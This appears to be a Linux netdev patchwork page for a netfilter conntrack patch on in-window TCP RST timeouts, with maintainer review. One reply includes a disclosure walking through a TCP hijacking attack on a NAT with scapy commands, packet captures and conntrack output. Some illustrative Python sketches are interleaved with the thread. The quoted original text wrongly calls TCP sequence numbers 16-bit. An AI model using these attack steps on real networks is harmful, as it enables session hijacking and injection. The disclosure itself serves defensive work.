netfilter: conntrack: tcp: do not lower timeout to CLOSE for in-window RSTs

Message ID 20240705040013.29860-1-979093444@qq.com (mailing list archive)
State Awaiting Upstream
Delegated to: Netdev Maintainers
Series netfilter: conntrack: tcp: do not lower timeout to CLOSE for in-window RSTs

Checks

Context Check Description
netdev/series_format warning Single patches do not need cover letters; Target tree name not specified in the subject
netdev/tree_selection success Guessed tree name to be net-next
netdev/ynl success Generated files up to date; no warnings/errors; no diff in generated;
netdev/fixes_present success Fixes tag not required for -next series
netdev/header_inline success No static functions without inline keyword in header files
netdev/build_32bit success Errors and warnings before: 816 this patch: 816
netdev/build_tools success No tools touched, skip
netdev/cc_maintainers success CCed 8 of 8 maintainers
netdev/build_clang success Errors and warnings before: 821 this patch: 821
netdev/verify_signedoff success Signed-off-by tag matches author and committer
netdev/deprecated_api success None detected
netdev/check_selftest success No net selftest shell script
netdev/verify_fixes success No Fixes tag
netdev/build_allmodconfig_warn success Errors and warnings before: 821 this patch: 821
netdev/checkpatch warning WARNING: From:/Signed-off-by: email address mismatch: 'From: yyxRoy <yyxroy22@gmail.com>' != 'Signed-off-by: yyxRoy <979093444@qq.com>'
netdev/build_clang_rust success No Rust files in patch. Skipping build
netdev/kdoc success Errors and warnings before: 0 this patch: 0
netdev/source_inline success Was 0 now: 0
netdev/contest success net-next-2024-07-05--06-00 (tests: 695)

Commit Message

yyxRoy July 5, 2024, 4 a.m. UTC
With previous commit https://github.com/torvalds/linux/commit/be0502a
("netfilter: conntrack: tcp: only close if RST matches exact sequence"),
introduced to fight TCP in-window reset attacks, the current version of
netfilter keeps the connection state in ESTABLISHED but lowers the timeout
to that of CLOSE (10 seconds by default) for in-window TCP RSTs, and waits
for the peer to send a challenge ACK to restore the connection timeout
(5 mins in tests).

However, malicious attackers can prevent challenge ACKs from being sent by
manipulating the TTL value of RSTs. The attacker can probe the hop count
between itself and the NAT device and send in-window RST packets whose
TTL reaches 0 at the NAT device.
This causes the packet to be dropped rather than forwarded to the
internal client, so no challenge ACK is triggered.
As the window is quite large (bigger than 60,000 in tests) and the
sequence number is 32-bit, the attacker only needs to send roughly
2^32 / 60,000 (about 72,000) RST packets with sequence numbers spaced one
window apart (i.e., 1, 60001, 120001, and so on) and one of them will
definitely fall within the window.

Therefore we can't simply lower the connection timeout to 10 seconds
(rather short) upon receiving in-window RSTs. With this patch, netfilter
will lower the connection timeout to that of CLOSE only when it receives
RSTs with exact sequence numbers (i.e., old_state != new_state).

Signed-off-by: yyxRoy <979093444@qq.com>
---
 net/netfilter/nf_conntrack_proto_tcp.c | 3 ++-
 1 file changed, 2 insertions(+), 1 deletion(-)

Comments

Florian Westphal July 5, 2024, 9:43 a.m. UTC | #1
yyxRoy <yyxroy22@gmail.com> wrote:
> With previous commit https://github.com/torvalds/linux/commit/be0502a
> ("netfilter: conntrack: tcp: only close if RST matches exact sequence")
> to fight against TCP in-window reset attacks, current version of netfilter
> will keep the connection state in ESTABLISHED, but lower the timeout to
> that of CLOSE (10 seconds by default) for in-window TCP RSTs, and wait for
> the peer to send a challenge ack to restore the connection timeout
> (5 mins in tests).
> 
> However, malicious attackers can prevent incurring challenge ACKs by
> manipulating the TTL value of RSTs. The attacker can probe the TTL value
> between the NAT device and itself and send in-window RST packets with
> a TTL value to be decreased to 0 after arriving at the NAT device.
> This causes the packet to be dropped rather than forwarded to the
> internal client, thus preventing a challenge ACK from being triggered.
> As the window of the sequence number is quite large (bigger than 60,000
> in tests) and the sequence number is 16-bit, the attacker only needs to
> send nearly 60,000 RST packets with different sequence numbers
> (i.e., 1, 60001, 120001, and so on) and one of them will definitely
> fall within in the window.
> 
> Therefore we can't simply lower the connection timeout to 10 seconds
> (rather short) upon receiving in-window RSTs. With this patch, netfilter
> will lower the connection timeout to that of CLOSE only when it receives
> RSTs with exact sequence numbers (i.e., old_state != new_state).

This effectively ignores most RST packets, which will clog up the
conntrack table (established timeout is 5 days).

I don't think there is anything sensible that we can do here.

Also, one can send train with data packet + rst and we will hit
the immediate close conditional:

   /* Check if rst is part of train, such as
    *   foo:80 > bar:4379: P, 235946583:235946602(19) ack 42
    *   foo:80 > bar:4379: R, 235946602:235946602(0)  ack 42
    */
    if (ct->proto.tcp.last_index == TCP_ACK_SET &&
        ct->proto.tcp.last_dir == dir &&
        seq == ct->proto.tcp.last_end)
            break;

So even if we'd make this change it doesn't prevent remote induced
resets.

Conntrack cannot validate RSTs precisely due to lack of information,
only the endpoints can do this.
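
As a rough illustration of the point above, the RST handling for an ESTABLISHED entry can be modeled as follows. This is a simplified Python sketch, not the kernel code: `TrackedState`, `classify_rst` and the field `peer_maxack` are hypothetical names, the RST is assumed to have already passed the window checks, and the invalid-RST and not-yet-established cases are left out.

```python
from dataclasses import dataclass

TCP_ACK_SET = "ACK"  # stand-in for the kernel enum value of the same name


@dataclass
class TrackedState:
    peer_maxack: int  # highest ACK seen from the opposite direction
    last_index: str   # flag class of the previously tracked packet
    last_dir: int     # direction of the previously tracked packet (0 or 1)
    last_end: int     # sequence number just past that packet's payload


def classify_rst(ct: TrackedState, direction: int, seq: int) -> str:
    """Return the state an ESTABLISHED entry ends up in after an in-window RST."""
    if seq == ct.peer_maxack:
        return "CLOSE"        # RST matches the exact expected sequence number
    if (ct.last_index == TCP_ACK_SET and ct.last_dir == direction
            and seq == ct.last_end):
        return "CLOSE"        # RST directly follows a data packet (train)
    return "ESTABLISHED"      # inexact RST: keep state, allow a challenge ACK


ct = TrackedState(peer_maxack=1000, last_index=TCP_ACK_SET, last_dir=0, last_end=1000)
print(classify_rst(ct, direction=1, seq=5000))  # blind in-window RST

# The sender first injects a 19-byte in-window data packet at seq 5000 ...
ct.last_dir, ct.last_end = 1, 5000 + 19
# ... followed by an RST whose seq equals the end of that data packet.
print(classify_rst(ct, direction=1, seq=5019))
```

In this model the first RST leaves the entry in ESTABLISHED, while the data packet + RST pair moves it to CLOSE, which is why changing only the timeout branch does not stop a remotely induced reset.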
Jozsef Kadlecsik July 6, 2024, 4:16 p.m. UTC | #2
On Fri, 5 Jul 2024, Florian Westphal wrote:

> yyxRoy <yyxroy22@gmail.com> wrote:
> > With previous commit https://github.com/torvalds/linux/commit/be0502a
> > ("netfilter: conntrack: tcp: only close if RST matches exact sequence")
> > to fight against TCP in-window reset attacks, current version of netfilter
> > will keep the connection state in ESTABLISHED, but lower the timeout to
> > that of CLOSE (10 seconds by default) for in-window TCP RSTs, and wait for
> > the peer to send a challenge ack to restore the connection timeout
> > (5 mins in tests).
> > 
> > However, malicious attackers can prevent incurring challenge ACKs by
> > manipulating the TTL value of RSTs. The attacker can probe the TTL value
> > between the NAT device and itself and send in-window RST packets with
> > a TTL value to be decreased to 0 after arriving at the NAT device.
> > This causes the packet to be dropped rather than forwarded to the
> > internal client, thus preventing a challenge ACK from being triggered.
> > As the window of the sequence number is quite large (bigger than 60,000
> > in tests) and the sequence number is 16-bit, the attacker only needs to
> > send nearly 60,000 RST packets with different sequence numbers
> > (i.e., 1, 60001, 120001, and so on) and one of them will definitely
> > fall within in the window.
> > 
> > Therefore we can't simply lower the connection timeout to 10 seconds
> > (rather short) upon receiving in-window RSTs. With this patch, netfilter
> > will lower the connection timeout to that of CLOSE only when it receives
> > RSTs with exact sequence numbers (i.e., old_state != new_state).
> 
> This effectively ignores most RST packets, which will clog up the
> conntrack table (established timeout is 5 days).
> 
> I don't think there is anything sensible that we can do here.
> 
> Also, one can send train with data packet + rst and we will hit
> the immediate close conditional:
> 
>    /* Check if rst is part of train, such as
>     *   foo:80 > bar:4379: P, 235946583:235946602(19) ack 42
>     *   foo:80 > bar:4379: R, 235946602:235946602(0)  ack 42
>     */
>     if (ct->proto.tcp.last_index == TCP_ACK_SET &&
>         ct->proto.tcp.last_dir == dir &&
>         seq == ct->proto.tcp.last_end)
>             break;
> 
> So even if we'd make this change it doesn't prevent remote induced
> resets.
> 
> Conntrack cannot validate RSTs precisely due to lack of information,
> only the endpoints can do this.

I fully agree with Florian: conntrack plays the role of a middle box and 
cannot absolutely know the right seq/ack numbers of the client/server 
sides. Add NAT on top of that and there are a couple of ways to attack a 
given traffic. I don't see a way by which the checkings/parameters could 
be tightened without blocking real traffic.
 
Best regards,
Jozsef
Florian Westphal July 6, 2024, 5:04 p.m. UTC | #3
Jozsef Kadlecsik <kadlec@blackhole.kfki.hu> wrote:
> I fully agree with Florian: conntrack plays the role of a middle box and 
> cannot absolutely know the right seq/ack numbers of the client/server 
> sides. Add NAT on top of that and there are a couple of ways to attack a 
> given traffic. I don't see a way by which the checkings/parameters could 
> be tightened without blocking real traffic.

I forgot about TCP timestamps, which we do not track at the moment.

But then there is a slight caveat: if one side exits, RST won't
carry timestamp option, so even keeping track of timestamps won't help
:-(
yyxRoy July 8, 2024, 8:59 a.m. UTC | #4
On Fri, 5 Jul 2024 at 17:43, Florian Westphal <fw@strlen.de> wrote:
> Also, one can send train with data packet + rst and we will hit
> the immediate close conditional:
> 
>    /* Check if rst is part of train, such as
>     *   foo:80 > bar:4379: P, 235946583:235946602(19) ack 42
>     *   foo:80 > bar:4379: R, 235946602:235946602(0)  ack 42
>     */
>     if (ct->proto.tcp.last_index == TCP_ACK_SET &&
>         ct->proto.tcp.last_dir == dir &&
>         seq == ct->proto.tcp.last_end)
>             break;
> 
> So even if we'd make this change it doesn't prevent remote induced
> resets.

Thank you for your time and prompt reply and for bringing to my attention the case
I had overlooked. I acknowledge that as a middlebox, Netfilter faces significant
challenges in accurately determining the correct sequence and acknowledgment
numbers. However, it is crucial to consider the security implications as well.

For instance, previously, an in-window RST could switch the mapping to the
CLOSE state with a mere 10-second timeout. The recent patch, 
 (netfilter: conntrack: tcp: only close if RST matches exact sequence),
has aimed to improve security by keeping the mapping in the established state
and extending the timeout to 300 seconds upon receiving a Challenge ACK.

However, this patch is still insufficient to completely prevent attacks.
As I mentioned, attackers can manipulate the TTL to prevent the peer from
responding with a Challenge ACK, leaving the mapping at the
10-second timeout. This duration is quite short and potentially dangerous,
leading to various attacks, including TCP hijacking (I have included a detailed
report on potential attacks below, if time permits).

    else if (unlikely(index == TCP_RST_SET))
            timeout = timeouts[TCP_CONNTRACK_CLOSE];

The problem is that current netfilter only checks whether the packet has the RST flag
(index == TCP_RST_SET) and then lowers the timeout to that of CLOSE (10 seconds only).
I strongly recommend implementing measures to prevent such vulnerabilities.
For example, in the case of an in-window RST, could we consider lowering
the timeout to 300 seconds or some other value?

Thank you for considering these points. Once again, thank you for your time and 
efforts in enhancing community security and usability.

Best regards,
Yuxiang
****************************************************************************************************************************************************************************************************

For those interested, here is a case study illustrating how a 10-second timeout can lead to a TCP hijacking attack. I hope it won't waste your time and effort, and that the plain-text format explains the situation clearly.

General Disclosure: Insufficient TCP Sequence Number Validation in Linux Netfilter

1. Threat model
Figure 1 shows the threat model of the TCP hijacking attack. The victim client, behind a Linux NAT device with Netfilter enabled, connects to a remote server over TCP to access online services. A malicious attacker is inside the same LAN, as in Wi-Fi or VPN NAT scenarios. The attacker also controls a machine on the Internet that is capable of IP spoofing. The attacker in the LAN can hijack the TCP session between another client and the remote server, terminating the original TCP connection or injecting forged messages into it, which may lead to denial of service or privacy leakage.

victim-client                                                      remote-server
             \                                                   /
              \                                                 /
               \                                               /
                ----------NAT device with Netfilter ----------
               /                                              \  
              /                                                \
             /                                                  \
local-attacker                                                    IP-spoofable-machine
                                                                  (controlled by the attacker)
Fig 1. Threat model of the TCP hijacking attack.

2. Experiment Setup
We take the VPN scenario as the example in this disclosure and create a test environment as shown in Fig. 2. All machines run Ubuntu 22.04. We configured the NAT device as the VPN server using OpenVPN, and the client and the attacker both connect to it via OpenVPN.
The victim client establishes a TCP connection with the remote server (such as an SSH connection or a web page access). Here we take a simple TCP connection as an example, in which the client and server run netcat to establish a connection as follows.

vpn-client (tun0:10.8.0.3)                                                remote-server (eth0:43.159.39.110)
          \                                                              /
           \                                                            /
            \                                                          /
             ---- (tun0:10.8.0.1) vpn server (eth0:43.163.229.240) ----
            /                                                          \
           /                                                            \
          /                                                              \
local-attacker (tun0:10.8.0.2)                                            IP-spoofable-machine
                                                                          (controlled by the attacker)

Fig 2. Testing environment.

The server starts the netcat service and listens on port 80.
------------------
remote-server@remote-server:~$sudo nc -l -p 80
hello,i'm client
HELLO,I'M SERVER
------------------
The victim establishes a TCP connection with source port 40000.
------------------
victim-client@victim-client:~$nc 43.159.39.110 80 -p 40000
hello,i'm client
HELLO,I'M SERVER
------------------
There will be a corresponding NAT mapping recorded by Netfilter as follows:
------------------
VPN-server@VPN-server:~$sudo conntrack -L | grep 43.159.39.110
tcp 6 431973 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED] mark=0 use=1
------------------


3. Attack Steps
3.1 In the first step, the attacker infers the TCP source port used by the victim.
(1) The attacker constructs a SYN packet from itself to the server with a guessed source port m. In most cases, the guess will be wrong. For example, let m be 50000.
------------------
local-attacker@local-attacker:~$ sudo scapy
>>>send(IP(src="10.8.0.2",dst="43.159.39.110",ttl=2)/TCP(seq=1,ack=1,sport=50000,dport=80,flags="S"),iface="tun0")
------------------
Netfilter will create a new NAT mapping to record the session as follows:
------------------
VPN-server@VPN-server:~$sudo conntrack -L | grep 43.159.39.110
tcp 6 431841 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED] mark=0 use=1
tcp 6 115 SYN_SENT src=10.8.0.2 dst=43.159.39.110 sport=50000 dport=80 [UNREPLIED] src=43.159.39.110 dst=10.203.0.5 sport=80 dport=50000 mark=0 use=1
------------------
Then the attacker uses its spoofing-capable machine to send a SYN/ACK packet, spoofed as coming from the server, to the NAT device’s external IP address and the guessed port in order to verify the guess.
------------------
spoofable-machine@spoofable-machine:~$ sudo scapy
>>>send(IP(src="43.159.39.110",dst="43.163.229.240")/TCP(seq=1,ack=1,sport=80,dport=50000,flags="SA"))
------------------
In this case, the SYN/ACK packet matches the second NAT mapping (the attacker’s) and is forwarded to the attacker.
------------------
local-attacker@local-attacker:~$ sudo tcpdump -i any -nSvvv host 43.159.39.110
16:20:31.073779 tun0 Out IP (tos 0x0, ttl 2, id 1, offset 0, flags [none], proto TCP (6), length 40)
    10.8.0.2.50000 > 43.159.39.110.80: Flags [S], cksum 0x6f29 (correct), seq 1, win 8192, length 0
16:22:11.608374 tun0 In IP (tos 0x64, ttl 54, id 1, offset 0, flags [none], proto TCP (6), length 40)
    43.159.39.110.80 > 10.8.0.2.50000: Flags [S.], cksum 0x6f19 (correct), seq 1, ack 1, win 8192, length 0
------------------

(2) However, suppose the attacker guesses the right source port (i.e., 40000) when sending the SYN packet.
------------------
local-attacker@local-attacker:~$ sudo scapy
>>>send(IP(src="10.8.0.2",dst="43.159.39.110",ttl=2)/TCP(seq=1,ack=1,sport=40000,dport=80,flags="S"),iface="tun0")
------------------
Netfilter will translate it to another, random source port to resolve the port collision. For example, it chooses 63503 and the NAT mapping is as follows.
------------------
VPN-server@VPN-server:~$sudo conntrack -L | grep 43.159.39.110
tcp 6 431841 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED] mark=0 use=1
tcp 6 114 SYN_SENT src=10.8.0.2 dst=43.159.39.110 sport=40000 dport=80 [UNREPLIED] src=43.159.39.110 dst=10.203.0.5 sport=80 dport=63503 mark=0 use=1
------------------
Then the attacker uses its spoofing-capable machine to send the verification SYN/ACK packet to the guessed port 40000.
------------------
spoofable-machine@spoofable-machine:~$ sudo scapy
>>>send(IP(src="43.159.39.110",dst="43.163.229.240")/TCP(seq=1,ack=1,sport=80,dport=40000,flags="SA"))
------------------
However, this time it will be forwarded to the victim client instead of the attacker, as it matches the first NAT mapping.

Finally, the attacker can find the source port used by the victim by traversing the entire space of possible source ports and exploiting the difference described above between a correct and an incorrect guess, that is, whether or not it receives the spoofed SYN/ACK packet.
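
The port-inference side channel in step 3.1 can be sketched with a toy model. This is a minimal Python simulation under stated assumptions, not Netfilter's actual port allocation: the class `ToyNat` and the function `infer_victim_port` are hypothetical, and the table is keyed on the external port only, whereas conntrack matches on the full tuple.

```python
import random


class ToyNat:
    """Toy source-NAT table mapping an external port to an internal host."""

    def __init__(self):
        self.by_ext_port = {}

    def outbound_syn(self, host, sport):
        # Keep the source port if it is free externally; otherwise pick
        # another free port at random (the collision case in step (2)).
        ext = sport
        while ext in self.by_ext_port:
            ext = random.randint(1024, 65535)
        self.by_ext_port[ext] = host
        return ext

    def inbound_synack(self, dport):
        # A spoofed SYN/ACK is delivered to whoever owns that external port.
        return self.by_ext_port.get(dport)


def infer_victim_port(nat, candidates):
    """Return the first port whose spoofed SYN/ACK does not come back."""
    for port in candidates:
        nat.outbound_syn("attacker", port)
        if nat.inbound_synack(port) != "attacker":
            return port  # the SYN/ACK went elsewhere: port already in use
    return None


nat = ToyNat()
nat.outbound_syn("victim", 40000)
print(infer_victim_port(nat, range(39990, 40010)))  # prints 40000
```

Every wrong guess creates a mapping the attacker owns, so the spoofed SYN/ACK comes back; only the victim's port behaves differently.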
 
3.2 In the second step, the attacker intercepts a message of the victim's current TCP connection to obtain the exact sequence number and acknowledgment number.
(1) Since the current version of Netfilter does not check the sequence number strictly, an RST packet with an in-window sequence number can change the state of the mapping. With the previous patch (https://github.com/torvalds/linux/commit/be0502a3f2e94211a8809a09ecbc3a017189b8fb) to fight blind TCP reset attacks, instead of moving the NAT mapping directly to CLOSE with a 10-second timeout, the mapping stays in ESTABLISHED, but the timeout is still decreased to 10 seconds. Normally the in-window RST triggers the endpoint to respond with a Challenge ACK packet, which updates the timeout of the mapping to 300 seconds.
However, we find that the timeout update can be bypassed by a malicious attacker. The attacker can probe the hop count between the spoofing machine and the NAT device and send an in-window RST packet whose TTL reaches 0 at the NAT device, so it is dropped rather than forwarded to the victim client and no Challenge ACK is triggered. Besides, as the window is quite large (bigger than 60,000 in our test) and the sequence number is 32-bit, the attacker only needs to send roughly 2^32 / 60,000 (about 72,000) RST packets with sequence numbers spaced one window apart (i.e., 1, 60001, 120001, and so on) and one of them will definitely land in the window.
------------------
spoofable-machine@spoofable-machine:~$ sudo scapy
>>>send(IP(src="43.159.39.110",dst="43.163.229.240",ttl=10)/TCP(seq=1319804841+60000,ack=1,sport=80,dport=40000,flags="R"))
------------------
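The number of RSTs needed follows from dividing the TCP sequence space by the window size. The sketch below is a minimal Python calculation assuming a 60,000-byte window (the figure from the test above) and TCP's 32-bit sequence numbers; the helper name `rst_sequence_numbers` is hypothetical. Under these assumptions the count comes out at about 72,000 probes.

```python
import math

SEQ_SPACE = 2 ** 32  # TCP sequence numbers are 32 bits wide
WINDOW = 60_000      # window size assumed from the test above


def rst_sequence_numbers(window=WINDOW, start=1):
    """Yield one probe sequence number per window-sized stride."""
    for k in range(math.ceil(SEQ_SPACE / window)):
        yield (start + k * window) % SEQ_SPACE


probes = list(rst_sequence_numbers())
print(len(probes))   # 71583 probes cover the whole sequence space
print(probes[:3])    # [1, 60001, 120001]
```

Because consecutive probes are exactly one window apart, any window of at least 60,000 sequence numbers contains at least one of them.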
It takes only a short time (about 1-2 seconds) for current machines to send that many RST packets. As a result, the NAT mapping is removed shortly after the RST packets are sent.
------------------
VPN-server@VPN-server:~$sudo conntrack -L | grep 43.159.39.110
tcp 6 431841 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED] mark=0 use=1
VPN-server@VPN-server:~$#####After RST
VPN-server@VPN-server:~$sudo conntrack -L | grep 43.159.39.110
tcp 6 10 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED] mark=0 use=1
VPN-server@VPN-server:~$#####After 10 seconds
VPN-server@VPN-server:~$sudo conntrack -L | grep 43.159.39.110
tcp 6 0 ESTABLISHED src=10.8.0.3 dst=43.159.39.110 sport=40000 dport=80 src=43.159.39.110 dst=10.203.0.5 sport=80 dport=40000 [ASSURED] mark=0 use=1
VPN-server@VPN-server:~$#####After that
VPN-server@VPN-server:~$sudo conntrack -L | grep 43.159.39.110
------------------
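The timeout drop seen in the listing above, and the effect of the proposed patch, can be modeled roughly as follows. This is a simplified Python sketch of one branch of the timeout selection only, not the kernel function: `pick_timeout` and its `patched` flag are hypothetical, the retransmission and unacknowledged-data branches are omitted, and the timeout values are the defaults mentioned in this thread (5 days for ESTABLISHED, 10 seconds for CLOSE).

```python
# Timeouts in seconds, taken from the defaults mentioned in this thread.
TIMEOUTS = {"ESTABLISHED": 432000, "CLOSE": 10}


def pick_timeout(is_rst, old_state, new_state, patched):
    """Simplified timeout choice for one packet; other branches omitted."""
    if is_rst and (not patched or old_state != new_state):
        return TIMEOUTS["CLOSE"]
    return TIMEOUTS[new_state]


# In-window RST with an inexact sequence number: state stays ESTABLISHED.
print(pick_timeout(True, "ESTABLISHED", "ESTABLISHED", patched=False))  # 10
print(pick_timeout(True, "ESTABLISHED", "ESTABLISHED", patched=True))   # 432000
# RST with the exact sequence number: state moves to CLOSE either way.
print(pick_timeout(True, "ESTABLISHED", "CLOSE", patched=True))         # 10
```

The second call is the case the reviewers worry about: with the extra condition, an inexact RST no longer shortens the lifetime of the entry at all.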

(2) After the NAT mapping disappears, the attacker sends a TCP data packet to the server. After NAT, it looks the same as a packet sent by the victim client. The server will respond with an ACK packet, which is forwarded to the attacker and contains the correct sequence and acknowledgment numbers, as shown below:
------------------
local-attacker@local-attacker:~$ sudo scapy
>>>send(IP(src="10.8.0.2",dst="43.159.39.110")/TCP(seq=1,ack=1,sport=40000,dport=80,flags="PA"),iface="tun0")

local-attacker@local-attacker:~$ sudo tcpdump -i any -nSvvv host 43.159.39.110
16:44:21.141636 tun0 Out IP (tos 0x0, ttl 64, id 1, offset 0, flags [none], proto TCP (6), length 40)
    10.8.0.2.40000 > 43.159.39.110.80: Flags [P.], cksum 0x9623 (correct), seq 1, ack 1, win 8192, length 0
16:44:21.255077 tun0 In IP (tos 0x64, ttl 54, id 20259, offset 0, flags [DF], proto TCP (6), length 52)
    43.159.39.110.80 > 10.8.0.2.40000: Flags [.], cksum 0x651c (correct), seq 1319804847, ack 684909974, win 509, options [nop,nop,TS val 1722395496 ecr 995347412], length 0
------------------

3.3 In the third step, the attacker can use the obtained source port, sequence number, and acknowledgment number to send an RST packet that terminates the original TCP connection (such as an SSH session), to inject fake messages into the original TCP connection and manipulate the session (such as HTTP web pages), or to send requests to the server.
------------------
local-attacker@local-attacker:~$ sudo scapy
>>>send(IP(src="10.8.0.2",dst="43.159.39.110")/TCP(seq=684909974,ack=1319804847,sport=40000,dport=80,flags="PA")/"You are hijacked, send me money",iface="tun0")
------------------
On the server machine, the spoofed messages will be accepted as the sequence and acknowledgment numbers are right.
------------------
remote-server@remote-server:~$sudo nc -l -p 80
hello,i'm client
HELLO,I'M SERVER
You are hijacked, send me money
------------------
Florian Westphal July 8, 2024, 2:12 p.m. UTC | #5
yyxRoy <yyxroy22@gmail.com> wrote:
> On Fri, 5 Jul 2024 at 17:43, Florian Westphal <fw@strlen.de> wrote:
> > Also, one can send train with data packet + rst and we will hit
> > the immediate close conditional:
> > 
> >    /* Check if rst is part of train, such as
> >     *   foo:80 > bar:4379: P, 235946583:235946602(19) ack 42
> >     *   foo:80 > bar:4379: R, 235946602:235946602(0)  ack 42
> >     */
> >     if (ct->proto.tcp.last_index == TCP_ACK_SET &&
> >         ct->proto.tcp.last_dir == dir &&
> >         seq == ct->proto.tcp.last_end)
> >             break;
> > 
> > So even if we'd make this change it doesn't prevent remote induced
> > resets.
> 
> Thank you for your time and prompt reply and for bringing to my attention the case
> I had overlooked. I acknowledge that as a middlebox, Netfilter faces significant
> challenges in accurately determining the correct sequence and acknowledgment
> numbers. However, it is crucial to consider the security implications as well.

Yes, but we have to make do with the information we have (or we can
observe) and we have to trade this vs. occupancy of the conntrack table.

> For instance, previously, an in-window RST could switch the mapping to the
> CLOSE state with a mere 10-second timeout. The recent patch, 
>  (netfilter: conntrack: tcp: only close if RST matches exact sequence),
> has aimed to improve security by keeping the mapping in the established state
> and extending the timeout to 300 seconds upon receiving a Challenge ACK.

be0502a3f2e9 ("netfilter: conntrack: tcp: only close if RST matches
exact sequence")?

Yes, that is a side effect.  It was about preventing nat mapping from going
away because of RST packet coming from an unrelated previous connection
(Carrier-Grade NAT makes this more likely, unfortunately).

I don't know how to prevent it for RST flooding with known address/port
pairs.

> However, this patch's efforts are still insufficient to completely prevent attacks.
> As I mentioned, attackers can manipulate the TTL to prevent the peer from
> responding to the Challenge ACK, thereby reverting the mapping to the
> 10-second timeout. This duration is quite short and potentially dangerous,
> leading to various attacks, including TCP hijacking (I have included a detailed 
> report on potential attacks if time permits). 
> else if (unlikely(index == TCP_RST_SET))
>        timeout = timeouts[TCP_CONNTRACK_CLOSE];
> 
> The problem is that current netfilter only checks if the packet has the RST flag
> (index == TCP_RST_SET) and lowers the timeout to that of CLOSE (10 seconds only).
> I strongly recommend implementing measures to prevent such vulnerabilities.

I don't know how.

We can track TTL/NH.
We can track TCP timestamps.

But how would we use such extra information?
E.g. what if we observe:

ACK, TTL 32
ACK, TTL 31
ACK, TTL 30
ACK, TTL 29

... will we just refuse to update TTL?
If we reduce it, any attacker can shrink it to needed low value
to prevent later RST from reaching end host.

If we don't, connection could get stuck on legit route change?
What about malicious entities injecting FIN/SYN packets rather than RST?

If we have last ts.echo from remote side, we can make it harder, but
what do we do if RST doesn't carry timestamp?

Could be perfectly legal when machine lost state, e.g. power-cycled.
So we can't ignore such RSTs.

> For example, in the case of an in-window RST, could we consider lowering
> the timeout to 300 seconds or else?

Yes, but I don't see how it helps.
Attacker can prepend data packet and we'd still move to close.

And I don't really want to change that because it helps to get rid
of stale connection with real/normal traffic.

I'm worried that adding cases where we do not act on RSTs will cause
conntrack table to fill up.
Patch

diff --git a/net/netfilter/nf_conntrack_proto_tcp.c b/net/netfilter/nf_conntrack_proto_tcp.c
index ae493599a..d06259407 100644
--- a/net/netfilter/nf_conntrack_proto_tcp.c
+++ b/net/netfilter/nf_conntrack_proto_tcp.c
@@ -1280,7 +1280,8 @@  int nf_conntrack_tcp_packet(struct nf_conn *ct,
 	if (ct->proto.tcp.retrans >= tn->tcp_max_retrans &&
 	    timeouts[new_state] > timeouts[TCP_CONNTRACK_RETRANS])
 		timeout = timeouts[TCP_CONNTRACK_RETRANS];
-	else if (unlikely(index == TCP_RST_SET))
+	else if (unlikely(index == TCP_RST_SET) &&
+		 old_state != new_state)
 		timeout = timeouts[TCP_CONNTRACK_CLOSE];
 	else if ((ct->proto.tcp.seen[0].flags | ct->proto.tcp.seen[1].flags) &
 		 IP_CT_TCP_FLAG_DATA_UNACKNOWLEDGED &&